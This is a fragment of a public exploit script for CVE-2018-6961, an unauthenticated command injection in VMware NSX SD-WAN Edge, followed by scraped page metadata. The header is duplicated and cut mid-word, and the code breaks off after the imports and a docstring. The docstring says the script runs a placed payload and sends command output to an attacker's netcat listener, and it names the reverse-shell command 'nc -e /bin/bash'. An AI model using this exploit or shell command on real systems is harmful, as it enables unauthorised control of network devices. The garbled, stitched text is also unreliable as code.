#!/usr/bin/env python
# Exploit Title: Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud
# Date: 2018-06-29
# Exploit Author: paragonsec @ Cr #!/usr/bin/env python
# Exploit Title: Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud
# Date: 2018-06-29
# Exploit Author: paragonsec @ Critical Start
# Credit: Brian Sullivan from Tevora and Section 8 @ Critical Start
# Vendor Homepage: https://www.vmware.com
# Security Advisory: https://www.vmware.com/security/advisories/VMSA-2018-0011.html
# Version: 3.1.1
# CVE: CVE-2018-6961
import argparse
import requests
import sys
import collections
'''
This script will return execute whatever payload you placed within it.
Keep in mind that SD-WAN is running a slimmed down Linux version so obtaining a reverse shell isn't as simple as nc -e /bin/bash blah blah
The command within this script will send stdout of commands to your netcat listener. Feel free to change :)
'''
#Colors
OKRED = '
VMware NSX SD-WAN Edge Command Injection
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 360